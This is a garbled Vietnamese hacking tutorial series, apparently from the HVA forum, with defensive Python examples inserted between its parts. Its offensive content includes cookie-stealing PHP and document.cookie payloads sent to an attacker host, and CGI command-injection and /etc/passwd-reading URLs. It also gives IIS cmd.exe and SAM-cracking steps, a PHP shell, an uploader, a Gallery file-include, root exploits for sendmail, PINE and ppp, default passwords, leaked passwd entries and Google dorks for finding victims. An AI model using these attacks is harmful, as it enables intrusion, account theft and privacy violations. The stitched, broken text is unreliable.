clrar.value+="href="+K+"http://rd.yahoo.com/M=224039.2020109.3495275.19585
05/D=mail/S=150500014:FOOT2/A=1052425/R=5/SIG=11b5p6lhe/*http://privacy.
yahoo.com/privacy/us/mail/"+K+">Privacy \n"
clrar.value+="Policy</A></SMALL></CENTER>\n"
clrar.value+="<script>\n"
clrar.value+="var ypim_MA_Farm_URL =
"+K+"http://us.f137.mail.yahoo.com"+K+";\n"
clrar.value+="var ypim_AB_URL =
"+K+"http://address.yahoo.com/yab/us"+K+";\n"
clrar.value+="var ypim_CA_URL = "+K+"http://calendar.yahoo.com"+K+";\n"
clrar.value+="var ypim_NP_URL = "+K+"http://notepad.yahoo.com"+K+";\n"
clrar.value+="var ypim_MA_YY = "+K+"128340"+K+";\n"
clrar.value+="var ypim_IMG =
"+K+"http://us.i1.yimg.com/us.yimg.com/i/us/pim"+K+";\n"
clrar.value+="var ypim_Loc = "+K+"us"+K+";\n"
clrar.value+="var ypim_IsCalendarView = false;\n"
clrar.value+="var ypim_IsNotepadView = false;\n"
clrar.value+="var ypim_i18n_CheckMail = "+K+"Check Mail"+K+";\n"
clrar.value+="var ypim_i18n_Compose = "+K+"Compose"+K+";\n"
clrar.value+="var ypim_i18n_Folders = "+K+"Folders"+K+";\n"
clrar.value+="var ypim_i18n_Search = "+K+"Search"+K+";\n"
clrar.value+="var ypim_i18n_Options = "+K+"Options"+K+";\n"
clrar.value+="var ypim_i18n_Help = "+K+"Help"+K+";\n"
clrar.value+="var ypim_i18n_AddContact = "+K+"Add Contact"+K+";\n"
clrar.value+="var ypim_i18n_AddCategory = "+K+"Add Category"+K+";\n"
clrar.value+="var ypim_i18n_AddList = "+K+"Add List"+K+";\n"
clrar.value+="var ypim_i18n_ViewContacts = "+K+"View Contacts"+K+";\n"
clrar.value+="var ypim_i18n_ViewLists = "+K+"View Lists"+K+";\n"
clrar.value+="var ypim_i18n_Quickbuilder = "+K+"Quickbuilder"+K+";\n"
clrar.value+="var ypim_i18n_ImportContacts = "+K+"Import Contacts"+K+";\n"
</p>
</BODY></HTML>
Good tool, right???? hihihi. I am writing about 3-4 more tools and will show you how to use them effectively later; hitting the target every time is what makes it fun ... he he he
QUOTE
.....
<form action="" method="post" name="settings" >
.....
<select class=search name=status>
<option value=0>Admin </option>
<option value=1>Moderator</option>
<option selected value=2>Member</option>
<option value=3>Banned</option>
</select>
.....
Now open the page and press "submit". Nothing happens. Why? Look at this part:
<form action="" means that pressing "submit" sends the data (the form variables) to the file the form is currently loaded from. So we edit it a little: copy the URL, as shown in the browser, of the page we saved, for example:
QUOTE
http://www.tinhban.com/phpbb/member.php
so the form becomes:
QUOTE
.....
<form action="http://www.tinhban.com/phpbb/member.php" method="post"
name="settings" >
.....
<select class=search name=status>
<option value=0>Admin </option>
<option value=1>Moderator</option>
<option selected value=2>Member</option>
<option value=3>Banned</option>
</select>
.....
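The resubmitted form above only matters if the server trusts the `status` value it receives. The following is an added example, not code from the original page, showing a handler that makes that mistake beside one that decides from server-side state. The role numbers are taken from the form's option values; the function names, the in-memory user store and the session dictionary are assumptions made for illustration.

```python
"""Server-side handling of the 'status' field from the settings form.

Role numbers mirror the <option> values in the form shown above:
0 Admin, 1 Moderator, 2 Member, 3 Banned. Everything else here
(function names, user store, session dict) is hypothetical.
"""

ROLES = {0: "Admin", 1: "Moderator", 2: "Member", 3: "Banned"}

# Constructed sample data: user name -> current role number.
USERS = {"alice": 0, "bob": 2}


class Forbidden(Exception):
    """Raised when the caller may not perform the requested change."""


def update_settings_vulnerable(users, session, form):
    """The flaw the edited form relies on: 'status' is copied from the
    request straight into the caller's own record."""
    users[session["user"]] = int(form["status"])
    return users[session["user"]]


def update_settings_hardened(users, session, form):
    """Decide from server-side state only.

    - The acting user comes from the session, never from the form.
    - 'status' is parsed strictly and must be a known role.
    - Only an Admin may change a role, and never their own.
    """
    actor = session.get("user")
    if actor not in users:
        raise Forbidden("not logged in")
    target = form.get("target", actor)
    if target not in users:
        raise Forbidden("unknown target user")
    if "status" not in form:
        return users[target]          # no role change requested
    try:
        requested = int(form["status"])
    except (TypeError, ValueError):
        raise Forbidden("malformed status")
    if requested not in ROLES:
        raise Forbidden("unknown role")
    if requested == users[target]:
        return users[target]          # unchanged value, nothing to authorize
    if users[actor] != 0:
        raise Forbidden("only an Admin may change roles")
    if target == actor:
        raise Forbidden("an Admin may not change their own role")
    users[target] = requested
    return users[target]
```

Which options the HTML offers is irrelevant to the hardened handler: a Member who posts `status=0` is rejected because the stored role of the session user, not the form, decides.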
Code injection:
This is the technique of injecting code into a Web page from the client machine. It lets a hacker place executable code into another user's Web session. When that code runs, it lets the hacker do all sorts of things, from monitoring the Web session to taking full control of the victim's computer.
A typical example is a flaw in Web sites that use CGI, where hackers can run Unix commands from their own browser, as in the following example:
QUOTE
http://target/index.cgi?page=index.cgi
http://target/index.cgi?page=index.cgi >view the source of the file index.cgi
http://target/index.cgi?page=index.cgiswd >view the server's passwd file
http://target/index.cgi?page=index.cgils -la
http://target/index.cgi?page=index.cgi
http://target/index.cgi?page=index.cgi >run Unix commands
You have to be flexible in how you attack.
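The URLs above work when the CGI script passes the `page` value to a shell or uses it as a file name. The following is an added example, not code from the original page, that shows the flawed pattern beside a dispatcher that uses the parameter only as a key into a fixed table. The page names and template paths are hypothetical, and the sample URLs in the comments are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist: public page name -> file the server will send.
PAGES = {
    "index": "templates/index.html",
    "news": "templates/news.html",
    "contact": "templates/contact.html",
}

# A page name is a short lowercase token: no dots, slashes, spaces,
# pipes, semicolons or anything else a shell or a path would interpret.
_PAGE_NAME = re.compile(r"[a-z0-9_]{1,32}")


def command_vulnerable(url):
    """Flawed pattern: the raw parameter is pasted into a command line.

    Returns the string that would be handed to the shell, so the effect
    can be inspected without running anything.
    """
    page = parse_qs(urlsplit(url).query).get("page", [""])[0]
    return "cat " + page   # the shell also runs whatever follows ';' or '|'


def resolve_page(url):
    """Return the template path for the requested page, or None.

    The parameter never reaches a shell and is never joined to a
    directory; it is only looked up in PAGES.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("page", [])
    if len(values) != 1:            # missing or repeated parameter
        return None
    name = values[0]
    if not _PAGE_NAME.fullmatch(name):
        return None
    return PAGES.get(name)          # unknown names fall through to None


# Constructed requests:
#   resolve_page("http://target/index.cgi?page=news")
#       -> "templates/news.html"
#   resolve_page("http://target/index.cgi?page=index.cgi%3Bls%20-la")
#       -> None
```

A request the dispatcher rejects should get a plain 404 and a log entry; echoing the rejected value back into the error page would introduce a second injection point.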
7-No log-in required:
If an application is not designed rigorously and does not enforce the order of steps when it is browsed, that is a security hole: a hacker can exploit it to go straight to the internal pages without passing through the login step.
8-Eavesdropping:
Generally speaking, most networks do not carry information very securely, so an attacker who can get onto the data paths can "listen in" on or "read" the data stream passing through. When attackers eavesdrop on communications, this is called "sniffing" or "snooping". The power of eavesdropping lies in monitoring the network: it collects valuable information about the system, possibly a packet containing a password and user name. The programs that do this are called sniffers; their job is to listen on the ports of the system the hacker wants to attack, collect the data passing through those ports and send it back to the attacker.
9-Data Modification:
###################################################
####################
Author by : Anhdenday ( Staff of HVA ), and Hackertt ( Staff of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by : PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net
###################################################
####################
A word from the author: Many newbies have asked me what hacking is and how to hack. But you forget one thing: you need general knowledge and an understanding of the terms that people who know networking use. I am not really that good myself, but through my research I have put together some basic knowledge that I want to share with all of you so that we can learn together. I will not take responsibility if you use it to harass other people. You may copy this or post it on other Web sites, but please put the author's name under the article; respecting this article means respecting me and my effort, and it also means respecting yourselves. I have also included some basic hacking and cracking methods and examples here; you can try applying them and study
ging tip thng qua dual homed host hoc thng qua s kt hp gia bastion host
v screening rounter.
(Article by Z3RON3, HVA material)
8 . ) What is Unix?
_ Unix is an operating system (like Windows). It is currently the most powerful operating system and the one closest to hackers. If you become a real hacker, this OS is indispensable to you. It is used to support programming in the C language.
9 . ) What is Telnet?
_ Telnet is a program that lets us connect to another machine through a port. Every computer or server has ports; here are some common ones:
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois
_ Example: you can use Telnet to connect to mail.virgin.net on port 25.
10 . ) How do you know you have telnetted to a Unix system?
_ OK, I will tell you how a Unix system greets you when you connect to it. First, when you call a Unix system, it normally shows a prompt: "Log in:" (that alone does not make it certain that this is Unix, unless a message appears before the "log in:" text, for example: Welcome to SHUnix. Please log in.)
Now we are at the log in prompt and you need to enter a valid account. An account normally has 8 characters or more. After you enter the account you will see a password prompt; try the Default Password from the following table:
Account-------------------------Default Password
Root-----------------------------------------------Root
Sys------------------------------------------------Sys / System / Bin
Bin-------------------------------------------------Sys / Bin
Mountfsy------------------------------------------Mountfsys
Nuuc-----------------------------------------------Anon
Anon-----------------------------------------------Anon
User------------------------------------------------User
Games---------------------------------------------Games
Install----------------------------------------------Install
Demo-----------------------------------------------Demo
Guest----------------------------------------------Guest
11 . ) What is a shell account?
_ A shell account lets you use your home computer as a terminal (
the following paths:
CODE
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #of username>/<username>
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct =##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure
maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb =20
The text before the first / on each line is the name of the corresponding system; go by the system you actually want and follow the path after the first /.
And finally, here are some passwd accounts that I once cracked; they may no longer be valid by now:
CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh
To keep them secret I have deleted their passwords and put the symbol x in their place; see what information you can learn from these entries.
(End of part 1)
There are many more definitions as well as hacking and cracking tricks that I want to share with you, especially with newbies. I will post them one after another in the coming days, and I hope for your feedback so that the later parts are written better.
Remember, hacking is also an art, and it very much needs a love of learning as well as
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03
once that is done, delete the files 'getadmin.exe' and 'gasys.dll' from 'cgi-bin'. Our purpose in breaking into this system is to swipe the admin's password so that next time we can get in legitimately, so find the SAM file (which holds the passwords of the admin and the members) on the system and then use the program l0pht crack to crack the passwords (I have already posted a guide to using l0pht crack v 3.02; study it yourselves). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=
When the cracking is done you have the admin's user name and password; now delete the user account (mine is anhdenday) to be safe. What you do in the system is up to you, but do not delete all of their documents; have some pity on them.
How do you feel? Quite complicated, isn't it? When I first tried this method it took me a full 4 hours of fumbling; once you are used to it, the second time will take you less time.
In part 3 I will cover the Linux OS, how to break the password protection of a Web site, how to hack a Web page in the simplest way, etc.
GOOD LUCK !!!!!!
(End of part 2)
Article by ANHDENDAY
E.g.: for the IP address 192.168.0.1,
192.168.0 is the network address and 1 is the host address. Machines can share the same network address but must have different host addresses.
2-How do you get the IP address of a person, a website or another computer?
*Suppose you want the IP address of www.yahoo.com. It is simple: drop to DOS and type
C:\windows>ping www.yahoo.com
Pinging yahoo.com [216.115.108.245] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Here 216.115.108.245 is the ip address of www.yahoo.com
*Likewise, if you want the IP address of a computer named PC2 on a LAN, the following gives you PC2's IP address:
C:\windows>ping PC2
*Getting the IP address of someone who is chatting with you:
-Using ICQ
Just ask him whether he agrees to talk with you on ICQ; if there is a reply, the connection has been made. While chatting, drop to DOS for a moment and type netstat -n, and you will get his IP address. But you must make sure you are not using any other software that connects to the Internet, because that can give you many IP addresses: his address and those of the services you are connected to will all be listed when you type netstat -n (a later article will say more about the netstat commands).
-Using MSN and YAHOO MESSENGERS
This is the case where Yahoo or MSN programs are used to chat. If you use the command netstat -n you will not get the IP address of the person you are chatting with. So how do we get it??? There is one way. Tell him you will send him a very good song or something else using SEND FILE. If he agrees, send him a file he likes. While the file is being sent, drop to DOS and type netstat -n, and you will find his address, because when a file is sent the connection between you and him is direct and is not handled through the Yahoo or MSN server.
-Getting the IP addresses of people who visit your website
You have a website and you want to get the IP addresses of the people who visit the website
or
CODE
<?php
if ($contents && $header){
mail("victim@yahoo.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
echo "nope";
}
(Change victim@yahoo.com to your own mail address.)
Save this notepad file under the name <any name you like>.php (remember that it must end in .php), then upload it to a host that supports PHP; in my example it is abc.php. (For those of you who have built Web sites this should be very easy, right?) This code has the job of stealing the victim's information (and sometimes the cookie as well) when they open data containing this code, and it then automatically saves the information to the file <victim's ip>.txt.
_ There is another way to get cookies, used on forums that have this bug and have not fixed it: when posting, you only need to add the following code to your post:
CODE
document.write('<img src=http://host_php/abc.php?abc='+escape(document.cookie)
+'>')
where host_php is the address to which you uploaded the cookie-stealing file,
and abc.php is the file from my example.
_ Example: when applied inside an img tag, it is used as follows:
CODE
[img]javascript: Document.write('<img src=http://host_php/docs.php?
docs='+escape(document.cookie)+'>')[/img]
or:
CODE
[img]javascript: Document.write('<img src=http://host_php/docs.php?
docs='+escape(document.cookie)+'>')[/img]
_ You can find Web sites on which to practise the method in this example by going to google.com and searching for forums with this bug using the keyword "Powered by .. forum" with the following forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. If you are lucky you may find forums that have not fixed this bug and practise on them; whoever finds one, please share it with everyone.
_ There are many other good cookie-stealing snippets; look for more yourselves.
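The `[img]` posts above succeed only when a forum copies the tag body into its HTML unchecked and keeps the session in a cookie that page script can read. The following is an added example, not code from the original page or from any of the forum packages it names, of a renderer that accepts only plain http/https image URLs and escapes everything else, plus a session cookie marked HttpOnly. All function names are hypothetical.

```python
import html
import re
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

_IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def _safe_image_url(raw):
    """Return the URL if it is a plain http(s) URL, otherwise None."""
    url = raw.strip()
    # Quotes, angle brackets, backslashes, spaces and control characters
    # have no place in an image URL taken from user input.
    if any(c in "\"'<>`\\" or ord(c) < 0x21 for c in url):
        return None
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return url


def render_post(text):
    """Turn [img]url[/img] into <img> only for safe URLs.

    All other text, including a rejected [img] tag, is HTML-escaped and
    therefore displayed as literal text instead of being interpreted.
    """
    out = []
    pos = 0
    for match in _IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:match.start()]))
        url = _safe_image_url(match.group(1))
        if url is None:
            out.append(html.escape(match.group(0)))
        else:
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        pos = match.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def session_cookie(name, value):
    """Set-Cookie value for a session cookie hidden from document.cookie."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = "/"
    jar[name]["httponly"] = True    # not readable by page script
    jar[name]["secure"] = True      # sent over HTTPS only
    jar[name]["samesite"] = "Lax"
    return jar[name].OutputString()


# The post from the text above, used here as test input for the renderer.
SAMPLE_POST = ("[img]javascript: Document.write('<img src=http://host_php/"
               "docs.php?docs='+escape(document.cookie)+'>')[/img]")
```

With both measures in place the sample post is shown as inert text, and even a script that did run would not see the session cookie in `document.cookie`.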
22 . ) How to break the password protection of a Website:
_ When you go looking for information on some Web site, there are places on the site where you are stopped and a box appears asking for a password. This is a private area that hides confidential information meant only for certain people or a certain group (for example the place where viethacker.net keeps its hacking tools, which the e-chip newspaper mentioned). When we click on that link, it (normally) calls on the .htpasswd and .htaccess files located together in the directory that protects the Web page. Why does the file name '.htaccess' have to start with a dot? Files whose names begin with a dot '.' are treated by web servers as configuration files. These files are hidden when you browse a directory protected by a .htaccess file. These two files have the job of controlling access to the protected link you want to get into. One manages the passwords and user names, the other manages the encryption of the information for the first file. Only when you enter both correctly does the link open. Look at the following example:
CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f
You can already read the username, but does the password mean anything to you when you look at it ? Of course not . Do you understand why you cannot read it ? This is the .htaccess file intervening . Because the two files sit in the same directory and act together to protect each other, we would be foolish to try to break in and crack that damned pile of passwords ( as long as we have no password-cracking tools at hand . I am also researching how to get in directly; if I succeed I will post it for you ) . The flaw lies here : what happens if the .htpasswd sits outside the protected directory that holds the .htaccess file ? We can grab it easily . Look at the following example link :
http://www.company.com/cgi-bin/protected/
to check whether the .htpasswd file is protected by .htaccess or not, we enter the following URL :
http://www.company.com/cgi-bin/protected/.htpasswd
If you get the answer 'File not found' or something similar, then this file is certainly not protected; find it with one of the following URLs :
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n
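The condition described above, a password file that the web server itself will hand out, can be audited on your own server. The following Python is an added example, not code from the original article; the function names and the demo directory tree are constructed, and a relative AuthUserFile is assumed to resolve against the ServerRoot as Apache does.

```python
import os
import re
import tempfile

AUTH_USER_FILE = re.compile(r'^[ \t]*AuthUserFile[ \t]+"?([^"\r\n]+?)"?[ \t]*$', re.I | re.M)
WEAK = {"sha1-unsalted", "des-crypt", "plaintext-or-unknown"}


def hash_scheme(field):
    """Classify one htpasswd hash field by its documented prefix or shape."""
    if field.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if field.startswith("$apr1$"):
        return "apr1-md5"
    if field.startswith("{SHA}"):
        return "sha1-unsalted"
    if field.startswith("$"):
        return "crypt-other"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "des-crypt"
    return "plaintext-or-unknown"


def inside(path, root):
    """True when path resolves to a location under root (symlinks followed)."""
    path, root = os.path.realpath(path), os.path.realpath(root)
    return os.path.commonpath([path, root]) == root


def read(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def audit(docroot, server_root):
    """Walk the document root and return sorted (finding, location) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            if name == ".htpasswd":
                findings.append(("password-file-in-docroot", rel))
                for line in read(full).splitlines():
                    user, sep, field = line.strip().partition(":")
                    if sep and hash_scheme(field) in WEAK:
                        findings.append(("weak-hash:" + hash_scheme(field), rel + ":" + user))
            elif name == ".htaccess":
                for target in AUTH_USER_FILE.findall(read(full)):
                    resolved = os.path.join(server_root, target)  # absolute target wins
                    if not os.path.isfile(resolved):
                        findings.append(("authuserfile-missing", rel))
                    elif inside(resolved, docroot):
                        findings.append(("authuserfile-in-docroot", rel))
    return sorted(findings)


def write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo_findings():
    """Build a constructed tree: one leaked password file, one kept outside the docroot."""
    with tempfile.TemporaryDirectory() as base:
        docroot = os.path.join(base, "htdocs")
        leaked = os.path.join(docroot, "cgi-bin", "passwd", ".htpasswd")
        private = os.path.join(base, "private", ".htpasswd")
        # Constructed sample entries; the hash bodies are placeholders, not real hashes.
        write(leaked, "alice:{SHA}CONSTRUCTED-SAMPLE=\nbob:$2y$05$CONSTRUCTEDSAMPLE\n")
        write(private, "carol:$2y$05$CONSTRUCTEDSAMPLE\n")
        write(os.path.join(docroot, "cgi-bin", "protected", ".htaccess"),
              'AuthType Basic\nAuthUserFile "%s"\nRequire valid-user\n' % leaked)
        write(os.path.join(docroot, "members", ".htaccess"),
              "AuthType Basic\nAuthUserFile %s\nRequire valid-user\n" % private)
        return audit(docroot, base)


if __name__ == "__main__":
    for finding in demo_findings():
        print(finding)
```

The members directory produces no finding because its AuthUserFile points outside the document root, which is where the password file belongs.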
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
_ Li th 2 : li php.cgi
+ Tng t trn bn ch cn nh trn URL dng sau ly pass :
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc
hnh rt kh , cc bn hy vo trang google.com ri nh t kho :
/cgi-bin/php.cgi?/etc/passwd]
hoc cgi-bin/nph-test-cgi?/etc
sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh .
25 . ) K thut xm nhp my tnh ang online :
_ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th
ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc
s dng trn my ca nn nhn s b chm i mt cch ng k v nhng my
h khng share th khng th xm nhp c, do nu h tt my l mnh s b
cng cc khi cha kp chm account , c mt cch m thm hn , t lm gim tc
hn v c th xm nhp khi nn nhn khng share l dng chng trnh DOS tn
cng . Ok , ta s bt u :
_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu .
_ Vo Start ==> Run g lnh cmd .
_ Trong ca s DOS hy nh lnh net view <IP ca nn nhn>
CODE
+ VD : c:\net view 203.162.30.xx
_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh
net use < a bt k trn my ca bn> : <ip ca nn nhn>< share ca nn
nhn>
+ VD : c:\net use E : 203.162.30.xxC
_ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy
download chng trnh d passwd v s dng ( theo ti bn hy load chng trnh
pqwak2 p dng cho vic d passwd trn my s dng HH Win98 hoc Winme v
chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai
chng trnh tng t nhau , dng u ta nh IP ca nn nhn , dng th hai ta
nh tn a share ca nn nhn nhng i vi xIntruder ta ch chnh Delay
ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trong mng Internet
l trn dI 5000 .
_ Nu my ca nn nhn khng c share th ta nh lnh :
net use < a bt k trn my ca bn> : <ip ca nn nhn>c$ (hoc
d$)"administrator"
system($shell);
echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";}
echo "</body></html>";
?>
on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m )
v t tn l :
+ shellphp.php : file ny dng chy shell trn victim host .
+ init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload
file init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun
upload file ny ln l tiu )
Bn hy to thm mt file PHP vi m sau :
CODE
<?php
function handleupload() {
if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
$filename = $_FILES['userfile']['tmp_name'];
print "$filename was uploaded successfuly";
$realname = $_FILES['userfile']['name'];
print "realname is $realname\n";
print "copying file to uploads dir ".$realname;
copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); [B]// lu *PATH* chng
ta s thay i sau[/B]
} else {
echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";
}
}
if ($act == "upload") {
handleupload();
}
echo "<html><body>
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?
$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>
</form>
</body></html>";
?>
Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn .
_ Tip theo Bn vo Google, g "Powered by gallery" ri enter, Google s lit k mt
ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link
sau th xem n cn mc lI Gallery hay khng :
http://<tn trang Web ca nn nhn>/gallery./captionator.php?
GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tn host bn va ng k>/
Bi vit ca ANHDENDAY
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
-f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
[/quote]
V y l mt l hng kh. Ti s ch ra cch li dng l hng PINE bng Linux. Bng
cch xem process table bng ps bit user no chy PINE, sau thc hin lnh ls
in /tmp/ thu thp lockfile names cho mi user. Xem process table mt ln na s
hin ra mi user thot PINE hoc xem message trong INBOX.
To link t /tmp/.hamors_lockfile ti ~hamors/.rhosts s lm cho PINE to
~hamors/.rhosts l file dng 666 vi ni dung l PINE's process id. By gi c th
dng lnh echo "+ +" > /tmp/.hamors_lockfile, sau rm /tmp/.hamors_lockfile.
Th d, hamors l nn nhn v catluvr tn cng:
[Quote ]
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell;
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
[/quote]
By gi bn vo c root. "What's next?" Ty bn nhng ti mun khuyn bn
nn i password trc khi xa hay thay i cc th. thay i password bn phi
login bng telnet v login vi account mi. Sau ch cn nh: [I]passwd n s hi
pw c v pw mi. By gi ch c bn mi c pw v n c th ko di thi gian bn
upload, delete logs file v lm nhng g bn mun.
Rt cm n s ng h ca cc bn , v y l phn 5
31 . ) What is a TCP/IP packet ?
TCP/IP stands for Transmission Control Protocol and Internet Protocol. A TCP/IP packet is a block of compressed data to which a header is attached and which is then sent to another computer. This is how the Internet carries information : by sending packets. The header of a packet contains the IP address of the sender of the packet. You can rewrite a packet and make it look as if it came from someone else !! You can use this to try to get into many systems without being caught. You will have to run Linux or have a program that lets you do this.
32 . ) What is Linux :
_ In the original sense, Linux is the kernel of the OS. The kernel is a piece of software responsible for the communication between application programs and the hardware. It provides functions such as : file management, virtual memory management, input/output devices such as hard disks, screens, keyboards, .... But the Linux kernel is not yet an OS, because
(Request.QueryString("login"));
var password = var TempStr = RemoveBad
(Request.QueryString("password"));
_ Vy l ta fix xong li .
_ Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu ,
cc bn hy test th xem i , cc trang Web Vit Nam mnh b nhiu lm , ti
kim c kha kh pass admin bng cch th ny ri ( nhng cng bo h fix
li ) .
_ C nhiu trang khi login khng phi bng ' or ''= m bng cc nick name c
tht ng k trn trang Web , ta vo link thnh vin kim nick ca mt
admin test th nh .
Hack vui v .
====================================================
phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu
tn cng li hi lm cho trang Web hng mnh nh HVA ca chng ta b tt
nghn ch trong thI gian ngn cc admin bn i ung cafe ht m khng ai trng coi
. Km theo l cc phng php tn cng DoS v ang c s dng .
GOOKLUCK!!!!!!!!!!!!!!!!!!!!
( Ht phn 5 )
Bi vit ca ANHDENDAY .
V y l phn 6
38 . ) What is a DoS attack ? ( Denial Of Services Attack )
_ A DoS attack ( denial-of-service attack ) is a very dangerous kind of attack; with it, you only need one computer connected to the Internet to attack the other party's machine . In essence, in a DoS attack the hacker takes up a large amount of resources on the server ( the resources can be bandwidth, memory, CPU, hard disk, ... ) so that the server cannot respond to requests from other people's machines ( those of normal users ), and the server can quickly stop working, crash or reboot .
39 . ) The DoS attack types currently known and in use :
a . ) Winnuke :
_ This kind of DoS attack can only be applied to computers running Windows 9x . The hacker sends packets carrying "Out of Band" data to port 139 of the target computer. ( Port 139 is the NetBIOS port; this port only accepts packets that have the Out of Band flag set ) . When the victim's computer receives this packet, a blue error screen is shown to the victim, because Windows receives these packets but does not know how to react to the Out Of Band data, which leads to the system crashing .
b . ) Ping of Death :
